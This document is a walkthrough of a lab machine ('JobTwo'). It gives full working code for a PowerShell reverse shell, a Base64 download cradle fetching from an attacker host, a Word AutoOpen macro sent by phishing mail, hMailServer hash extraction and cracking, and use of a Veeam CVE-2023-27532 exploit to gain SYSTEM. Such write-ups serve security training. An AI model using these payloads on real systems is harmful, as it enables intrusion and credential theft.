Executive Summary
JobTwo is a Windows Server 2022 machine that simulates a realistic corporate phishing and privilege escalation scenario. The attack chain begins with a job posting website that solicits Word document CVs by email. By crafting a macro-embedded .docm file and sending it to the HR mailbox, whose attachments are opened automatically, we obtain an initial foothold as user julian. From there we find hMailServer installed on the box, decrypt its database password, extract the account password hashes and crack the one belonging to ferdinand (user flag). Finally, we exploit CVE-2023-27532, a missing-authentication flaw in the WCF endpoint of Veeam Backup & Replication that leaks stored credentials and exposes a SQL interface through which xp_cmdshell can be enabled, to execute commands as NT AUTHORITY\SYSTEM and retrieve the root flag.
Table of Contents
- Reconnaissance
- Web Enumeration
- Initial Access - VBA Macro Phishing
- Stable Shell with ConPtyShell
- Post-Exploitation as Julian
- Credential Extraction - hMailServer
- Lateral Movement to Ferdinand (User Flag)
- Privilege Escalation - CVE-2023-27532 (Veeam)
- Root Flag
- Attack Chain Summary
- Key Vulnerabilities
1. Reconnaissance
We start with a full Nmap scan using -A (aggressive mode: OS detection, version detection, script scanning, traceroute) and -Pn (skip host discovery, since ICMP may be blocked):
root@kali:/home/kali/htb/Job2# nmap -A -Pn <TARGET_IP>
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-25 07:56 -0400
Nmap scan report for <TARGET_IP>
Host is up (0.28s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp open smtp hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp open rpcbind
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after: 2122-05-09T13:41:37
445/tcp open microsoft-ds?
2049/tcp open rpcbind
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: JOB2
| NetBIOS_Domain_Name: JOB2
| NetBIOS_Computer_Name: JOB2
| DNS_Domain_Name: JOB2
| DNS_Computer_Name: JOB2
| Product_Version: 10.0.20348
|_ System_Time: 2026-06-25T12:57:42+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10001/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open storagecraft-image StorageCraft Image Manager
Key observations:
- Port 25 (SMTP) - hMailServer is running, so we can deliver mail to mailboxes on the box directly.
- Port 80/443 - an HTTP server; port 80 answers "Not Found" to a request by IP, and the TLS certificate on 443 names job2.vl and www.job2.vl, so the site is served by hostname.
- Port 5985 - WinRM, useful for lateral movement once we have credentials.
- Port 3389 - RDP.
- Build 20348 (Product_Version in rdp-ntlm-info) identifies Windows Server 2022.
We add the hostname to /etc/hosts so domain-based virtual hosting resolves correctly:
echo '<TARGET_IP> job2.vl www.job2.vl' >> /etc/hosts
We then check for anonymous/guest SMB access. Both attempts fail - null sessions and the guest account are disabled:
root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u '' -p ''
SMB <TARGET_IP> 445 JOB2 [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB <TARGET_IP> 445 JOB2 [-] JOB2\: STATUS_ACCESS_DENIED
root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u 'guest' -p ''
SMB <TARGET_IP> 445 JOB2 [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB <TARGET_IP> 445 JOB2 [-] JOB2\guest: STATUS_ACCOUNT_DISABLED
SMB is a dead end for now. We pivot to the web server.
2. Web Enumeration
Browsing to http://www.job2.vl reveals a boat rental company job posting page. The relevant section reads:
"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."
This is the entry point. The site explicitly asks for a Word document attachment, a classic phishing vector, and names the mailbox hr@job2.vl. Since SMTP on port 25 accepts mail for the local domain without authentication, we can deliver the attachment straight to that mailbox from our own host.
3. Initial Access - VBA Macro Phishing
How it works
Microsoft Word supports Visual Basic for Applications (VBA) macros embedded in macro-enabled .docm files. When such a document is opened with macros enabled, a subroutine named AutoOpen runs automatically. Normally a human would have to click through the macro warning; here the HR mailbox is handled by an automated process that opens attachments with macros enabled, so the macro launches our PowerShell reverse shell with no interaction at all.
Step 1 — Create the PowerShell reverse shell
We take the PowerShell #1 reverse shell from revshells.com, fill in our attacker IP and port 4444, and save it as shell.ps1. The payload opens a TCP connection back to our listener, reads each command we type, runs it through Invoke-Expression and writes the output (errors included) back over the socket:
cat shell.ps1
$LHOST = "<YOUR_IP>"   # attacker IP
$LPORT = 4444          # attacker listener port
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    # Drain whatever the operator has sent; the -1 drops the trailing newline
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData - 1)
    }
    # Execute the received command and return its output, or the error text
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()
Step 2 - Base64-encode a download cradle
Instead of embedding the full shell script inside the macro (which could trigger AV signatures), we use a download cradle: the macro tells PowerShell to fetch shell.ps1 from our HTTP server and execute it in memory. We encode the cradle in UTF-16LE Base64 (the format PowerShell's -EncodedCommand flag expects):
cmd='IEX(New-Object Net.WebClient).DownloadString("http://<YOUR_IP>/shell.ps1")'
echo -n "$cmd" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADwAWQBPAFUAUgBfAEkAUAA+AC8AcwBoAGUAbABsAC4AcABzADEAIgApAA==
Replace <YOUR_IP> with your own attacker IP and re-run the encoding to get your own base64 string.
Step 3 - Create the malicious Word document
This step requires a Windows machine with Microsoft Word (Microsoft 365 or an activated license; a trial VM works fine). The VBA project name shown in the editor matches the document name, so if you save as evil.docm the project appears as Project (evil).
- Open Word, create a new document and save it as evil.docm (Word Macro-Enabled Document).
- Go to View → Macros, type AutoOpen in the macro name box and click Create.
- In the VBA editor, right-click Project (evil) in the left pane → Insert → Module.
- Paste the following macro into the module.
AutoOpen fires when the document is opened with macros enabled. Document_Open is a Document event handler and only fires automatically from the ThisDocument module; in a standard module, as here, it is just a wrapper around AutoOpen, so put the same two routines in ThisDocument if you want the fallback to actually fire:
Sub AutoOpen()
    Shell "powershell -nop -w hidden -ep bypass -e <YOUR_BASE64_HERE>", vbHide
End Sub

Sub Document_Open()
    AutoOpen
End Sub
Save again as evil.docm: the default .docx format strips the VBA project, so the macro would be lost.
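As an added example (not code from the original writeup), the following Python script covers the encoding side of Steps 2 and 3 without needing Word: it builds the download cradle, encodes it the way powershell.exe -EncodedCommand expects (Base64 over UTF-16LE, which is why the iconv step above is needed), emits the VBA text to paste into the module, and also does the reverse, recovering the plaintext from a logged command line the way a responder would when triaging a process-creation event. The attacker IP 10.10.14.5 and the sample log line are assumptions, not values from the page.

```python
"""Build and decode the -EncodedCommand payload used in Steps 2 and 3.

Added example, not from the original writeup. The attacker IP and the
constructed process-creation log line in __main__ are illustrative.
"""
import base64
import re
from typing import Optional


def build_cradle(attacker_host: str, path: str = "/shell.ps1") -> str:
    """Download-and-execute cradle: fetch a script over HTTP and run it in memory."""
    return f'IEX(New-Object Net.WebClient).DownloadString("http://{attacker_host}{path}")'


def encode_powershell_command(command: str) -> str:
    """powershell.exe -EncodedCommand expects Base64 of the UTF-16LE bytes.
    Base64 over UTF-8 produces a string PowerShell cannot parse."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> str:
    """Inverse of encode_powershell_command; what a responder runs on a captured token."""
    return base64.b64decode(b64).decode("utf-16-le")


def build_vba_macro(encoded_command: str) -> str:
    """AutoOpen macro that launches the encoded command in a hidden window.
    Document_Open only fires on its own from ThisDocument; here it wraps AutoOpen."""
    return (
        "Sub AutoOpen()\n"
        f'    Shell "powershell -nop -w hidden -ep bypass -e {encoded_command}", vbHide\n'
        "End Sub\n"
        "\n"
        "Sub Document_Open()\n"
        "    AutoOpen\n"
        "End Sub\n"
    )


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The prefixes are listed explicitly so that -ep (ExecutionPolicy) is not mistaken for one.
_ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the Base64 token following an -EncodedCommand switch, or None."""
    m = _ENC_SWITCH.search(command_line)
    return m.group(1) if m else None


def decode_command_line(command_line: str) -> Optional[str]:
    """Recover the plaintext PowerShell from a logged command line, if it was encoded."""
    token = extract_encoded_command(command_line)
    return decode_powershell_command(token) if token else None


if __name__ == "__main__":
    cradle = build_cradle("10.10.14.5")  # assumed attacker IP
    b64 = encode_powershell_command(cradle)
    print(build_vba_macro(b64))
    # Constructed log line, shaped like the child process Sysmon/4688 would record
    logged = f"powershell -nop -w hidden -ep bypass -e {b64}"
    print(decode_command_line(logged))
```

Running the script prints the macro ready to paste, followed by the decoded cradle; the decoder is the same check you would apply to a suspicious powershell.exe command line in a process-creation log.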
Step 4 - Host the payload and set up the listener
On our attacker machine, we serve shell.ps1 over HTTP and start a Netcat listener:
python3 -m http.server 80
rlwrap -cAr nc -lnvp 4444
(rlwrap adds readline support for arrow keys and history in the shell.)
Step 5 — Send the phishing email
We use swaks (Swiss Army Knife for SMTP) to send the malicious document directly to hr@job2.vl via the open SMTP server on port 25. No authentication is required:
swaks \
--to hr@job2.vl \
--from exploit@notes.com \
--header 'Subject: Job Application' \
--body "Please review my resume" \
--attach @evil.docm \
--server <TARGET_IP>
=== Trying <TARGET_IP>:25...
=== Connected to <TARGET_IP>.
<- 220 JOB2 ESMTP
-> EHLO kali
<- 250-JOB2
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<exploit@notes.com>
<- 250 OK
-> RCPT TO:<hr@job2.vl>
<- 250 OK
-> DATA
<- 354 OK, send.
[... base64 encoded attachment ...]
<** 250 Queued (35.408 seconds)
=== Connection closed with remote host.
Note on timeouts: swaks may report a timeout waiting for the server's response, but as long as the message is accepted (250 Queued) the payload will run, because the server-side mail processor opens the attachment automatically.
Shortly after sending, our HTTP server receives a request for shell.ps1, and our listener catches the callback:
<TARGET_IP> - - [26/Jun/2026 06:38:56] "GET /shell.ps1 HTTP/1.1" 200 -
rlwrap -cAr nc -lnvp 4444
listening on [any] 4444 ...
connect to [<YOUR_IP>] from (UNKNOWN) [<TARGET_IP>] 57097
hostname
JOB2
hostname confirms we are on JOB2; whoami in the next section shows the shell runs as job2\julian.
4. Stable Shell with ConPtyShell
The initial Netcat shell is limited - no tab completion, no arrow keys, and commands like clear can break it. We upgrade to a full interactive PTY shell using ConPtyShell, which uses the Windows ConPTY API to provide a proper terminal experience.
Clone the tool and host it:
git clone https://github.com/antonioCoco/ConPtyShell.git
cd ConPtyShell
python3 -m http.server 8000
Start the listener for the new shell on port 4445 first. The stty calls put our terminal into raw mode and send its size to the remote side so the PTY is sized correctly:
stty raw -echo
( stty size; cat ) | nc -lvnp 4445
Then, in the Netcat shell on the target, download and invoke the script, pointing it at the new listener:
IEX (iwr http://<YOUR_IP>:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing)
Invoke-ConPtyShell <YOUR_IP> 4445
The listener receives the connection:
listening on [any] 4445 ...
connect to [<YOUR_IP>] from (UNKNOWN) [<TARGET_IP>] 65203
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32>
We now have a fully interactive Windows PowerShell session with tab completion and arrow keys. When the session ends, run stty sane locally to take the terminal out of raw mode.
5. Post-Exploitation as Julian
We enumerate our current user's privileges and context:
PS C:\> whoami
job2\julian
PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
=========== ==============================================
job2\julian S-1-5-21-3935782767-3829597994-1046841959-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
...
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Julian is a standard low-privilege user — Medium Integrity, no useful privileges like SeImpersonatePrivilege. We check the filesystem for other users and interesting directories:
PS C:\Users> net user
User accounts for \\JOB2
-------------------------------------------------------------------------------
Administrator DefaultAccount Ferdinand
Guest Julian svc_veeam
WDAGUtilityAccount
Three notable accounts: Ferdinand, Administrator, and a service account svc_veeam. Trying to access Ferdinand's directory is denied:
PS C:\Users> cd .\Ferdinand\
dir : Access to the path 'C:\Users\Ferdinand' is denied.
Browsing C:\Program Files (x86) we find hMailServer, the mail server that delivered our phishing mail, next to a Veeam directory. hMailServer keeps its account credentials in a local database, so its password hashes are a candidate for offline cracking.
PS C:\Program Files (x86)> dir
...
d----- 5/3/2023 1:48 PM hMailServer
d----- 5/3/2023 6:47 PM Veeam
...
6. Credential Extraction — hMailServer
Reading the config file
hMailServer stores its database connection settings in a plaintext .INI file, including an encrypted database password:
PS C:\Program Files (x86)\hMailServer\Bin> type hMailServer.INI
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
The Password field is encrypted with Blowfish using a key hardcoded in the hMailServer binary, so anyone who can read the INI can reverse it; PasswordEncryption=1 indicates the value is encrypted rather than stored in the clear.
Decrypting the database password
We use hMailDatabasePasswordDecrypter, a tool that reverses hMailServer's known encryption scheme:
root@kali:~# git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
root@kali:~# cd hMailDatabasePasswordDecrypter
root@kali:~# make
g++ blowfish.cpp main.cpp -o decrypt
root@kali:~# chmod +x decrypt
root@kali:~# ./decrypt 4e9989caf04eaa5ef87fd1f853f08b62
95C02068FD5D
The decrypted database password is 95C02068FD5D.
Opening the hMailServer database
hMailServer uses a SQL Server Compact Edition (.sdf) database file. We need to open it using the correct version of the SqlServerCe DLL.
First, we create a scratch directory and copy the database there (the original is locked by the running service):
PS C:\Program Files (x86)\hMailServer\Bin> New-Item -ItemType Directory -Force -Path C:\temp | Out-Null
PS C:\Program Files (x86)\hMailServer\Bin> Copy-Item "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf" C:\temp\
Attempting to open it with the v4.0 DLL fails with a version mismatch error, so we use the older v3.5 DLL which matches the database format:
# Start a fresh PowerShell session to avoid DLL conflicts from a previous attempt
Add-Type -Path "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\System.Data.SqlServerCe.dll"
$conn = New-Object System.Data.SqlServerCe.SqlCeConnection
$conn.ConnectionString = "Data Source=C:\temp\hMailServer.sdf;Password=95C02068FD5D"
$conn.Open()
PS C:\Program Files (x86)\hMailServer\Bin> $conn.State
Open
Querying the database for user credentials
We enumerate available tables:
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT table_name FROM information_schema.tables"
$r = $cmd.ExecuteReader()
while($r.Read()){ $r[0] }
hm_accounts
hm_domains
hm_settings
...
We identify the relevant columns in hm_accounts by reading the schema:
$cmd.CommandText = "SELECT * FROM hm_accounts"
$r = $cmd.ExecuteReader()
for($i=0;$i -lt $r.FieldCount;$i++){ $r.GetName($i) }
accountid
accountaddress
accountpassword
accountpwencryption
...
We extract email addresses and their password hashes:
$cmd.CommandText = "SELECT accountaddress, accountpassword FROM hm_accounts"
$r = $cmd.ExecuteReader()
while($r.Read()){ "$($r[0]) : $($r[1])" }
Julian@job2.vl : 8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f
Ferdinand@job2.vl : 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
hr@job2.vl : 1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055
Cracking the hashes with John the Ripper
hMailServer stores passwords as sha256($salt.$password): the first six hex characters of the stored value are the salt, and the remaining 64 are the hex SHA-256 digest of those salt characters followed by the password (the accountpwencryption column records which scheme is in use). John the Ripper recognises this as its hMailServer format. We save the hashes in address:hash form and run them against rockyou.txt:
cat > users.hash << 'EOF'
Julian@job2.vl:8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f
Ferdinand@job2.vl:04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
hr@job2.vl:1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055
EOF
john users.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (hMailServer [sha256($s.$p) 256/256 AVX2 8x])
Franzi123! (Ferdinand@job2.vl)
1g 0:00:00:05 DONE (2026-06-26 09:29) 0.1792g/s 2570Kp/s
Session completed.
Ferdinand's password is Franzi123!.
7. Lateral Movement to Ferdinand (User Flag)
We verify the credentials work for WinRM (port 5985) using NetExec:
nxc winrm <TARGET_IP> -u Ferdinand -p 'Franzi123!'
WINRM <TARGET_IP> 5985 JOB2 [+] JOB2\Ferdinand:Franzi123! (Pwn3d!)
(Pwn3d!) confirms Ferdinand can use WinRM. We connect with Evil-WinRM:
evil-winrm -i <TARGET_IP> -u Ferdinand -p 'Franzi123!'
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents>
We grab the user flag from Ferdinand's Desktop:
*Evil-WinRM* PS C:\Users\Ferdinand\Desktop> dir
Directory: C:\Users\Ferdinand\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/26/2026 12:29 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ferdinand\Desktop> type user.txt
[REDACTED]
Ferdinand is a member of Remote Management Users (which is why WinRM works) but, like Julian, holds no elevated privileges, so we need another route to SYSTEM.
8. Privilege Escalation — CVE-2023-27532 (Veeam)
Discovery
Alongside hMailServer we noticed a Veeam directory; the Backup & Replication console itself lives under C:\Program Files\Veeam\Backup and Replication. We read the file version of the console executable:
[System.Diagnostics.FileVersionInfo]::GetVersionInfo("C:\Program Files\Veeam\Backup and Replication\Console\veeam.backup.shell.exe").FileVersion
10.0.1.4854
Build 10.0.1.4854 is Veeam Backup & Replication v10a. Veeam's advisory for CVE-2023-27532 (KB4424) states that all versions are affected and ships fixes only for 11a and 12, so this v10a install, long out of support, cannot have been patched.
What is CVE-2023-27532?
CVE-2023-27532 is a critical vulnerability in Veeam Backup & Replication. The Veeam backup service exposes a Windows Communication Foundation (WCF) endpoint on TCP port 9401 that does not authenticate the client (clientCredentialType="None"). Anyone who can reach the port can:
- Extract the credentials for every account stored in the Veeam configuration database (backup infrastructure hosts, admin accounts, etc.).
- Achieve remote code execution as NT AUTHORITY\SYSTEM through an exposed SQL query interface, which can be used to enable and call xp_cmdshell.
The flaw was exploited in the wild by ransomware groups targeting enterprise backup infrastructure. On this box port 9401 was filtered in our Nmap scan, so it is reachable only from the host itself; that is why the exploit is run from Ferdinand's WinRM session against 127.0.0.1.
Exploitation
We use a public PoC: CVE-2023-27532-RCE-Only. The tool connects to port 9401 and uses the GetDataTable method to execute arbitrary SQL that enables and calls xp_cmdshell.
Clone on our attacker machine and host via Python HTTP server:
git clone https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
cd CVE-2023-27532-RCE-Only
python3 -m http.server 8000
The exploit requires three supporting DLLs from the Veeam installation alongside the executable. Download all four files to C:\temp on the target:
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/VeeamHax.exe -OutFile C:\temp\VeeamHax.exe
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Common.dll -OutFile C:\temp\Veeam.Backup.Common.dll
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Model.dll -OutFile C:\temp\Veeam.Backup.Model.dll
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Interaction.MountService.dll -OutFile C:\temp\Veeam.Backup.Interaction.MountService.dll
Our HTTP server confirms all files were fetched:
<TARGET_IP> - - [26/Jun/2026 11:03:09] "GET /VeeamHax.exe HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:10] "GET /Veeam.Backup.Common.dll HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:13] "GET /Veeam.Backup.Model.dll HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:18] "GET /Veeam.Backup.Interaction.MountService.dll HTTP/1.1" 200 -
We test the exploit without arguments to confirm it reaches the Veeam service on 127.0.0.1:9401:
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe
Targeting 127.0.0.1:9401
Now we pass our reverse shell payload (the same PowerShell reverse shell, base64-encoded as in Step 2 but pointing at port 3333 on our machine) via the --cmd flag. The exploit instructs Veeam's SQL backend to enable xp_cmdshell and run our command. xp_cmdshell executes as the SQL Server service account, and here the bundled instance runs as NT AUTHORITY\SYSTEM, as the callback confirms:
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --cmd "powershell -e <YOUR_BASE64_HERE>"
Targeting 127.0.0.1:9401
Our second listener, on port 3333, catches the shell:
PS C:\WINDOWS\system32> whoami
nt authority\system
We are now NT AUTHORITY\SYSTEM.
9. Root Flag
PS C:\WINDOWS\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2023 2:04 PM 1029 LINQPad 5.lnk
-ar--- 6/26/2026 12:29 PM 34 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
10. Attack Chain Summary
[Attacker]
│
├─ 1. Nmap scan → discovers SMTP (25), HTTP (80/443), RDP (3389), WinRM (5985); Veeam's port 9401 is filtered from outside
│
├─ 2. Web enum → job posting at www.job2.vl → "Send CV to hr@job2.vl as Word document"
│
├─ 3. Craft malicious .docm with VBA AutoOpen macro
│ └─ Macro: PowerShell downloads & executes shell.ps1 from attacker HTTP server
│
├─ 4. swaks sends .docm to hr@job2.vl via open SMTP (port 25)
│ └─ Mail bot opens document → macro fires → reverse shell
│
├─ 5. Shell as job2\julian (Medium integrity, no useful privs)
│
├─ 6. Enumerate filesystem → hMailServer found in Program Files (x86)
│ ├─ Read hMailServer.INI → encrypted DB password
│ ├─ Decrypt with hMailDatabasePasswordDecrypter → 95C02068FD5D
│ ├─ Copy .sdf DB to C:\temp, open with SqlServerCe v3.5
│ └─ Query hm_accounts → extract SHA256 password hashes
│
├─ 7. John the Ripper cracks Ferdinand's hash → Franzi123!
│
├─ 8. evil-winrm as Ferdinand → user.txt [REDACTED]
│
├─ 9. Discover Veeam Backup & Replication v10a (build 10.0.1.4854), unpatched for CVE-2023-27532
│
├─ 10. CVE-2023-27532 PoC run locally → unauthenticated RCE via Veeam WCF endpoint (127.0.0.1:9401)
│ └─ xp_cmdshell → PowerShell reverse shell as NT AUTHORITY\SYSTEM
│
└─ 11. root.txt [REDACTED]
11. Key Vulnerabilities
| # | Vulnerability | Impact | CVSS |
|---|---|---|---|
| 1 | Unauthenticated inbound SMTP to an auto-processed mailbox - hMailServer accepts mail for local addresses from any sender (normal for an MX), and hr@job2.vl opens attachments automatically | Phishing delivery without credentials | N/A |
| 2 | VBA macro execution - the mail handler opens attachments with macros enabled and no AV enforcement | Remote code execution via phishing | N/A |
| 3 | hMailServer credential storage - account passwords stored as crackable salted SHA-256 hashes; DB password in hMailServer.INI encrypted with a hardcoded Blowfish key | Credential theft → lateral movement | N/A |
| 4 | CVE-2023-27532 - Veeam Backup & Replication WCF endpoint on port 9401 with no client authentication | Unauthenticated RCE as SYSTEM via xp_cmdshell | 7.5 (High) |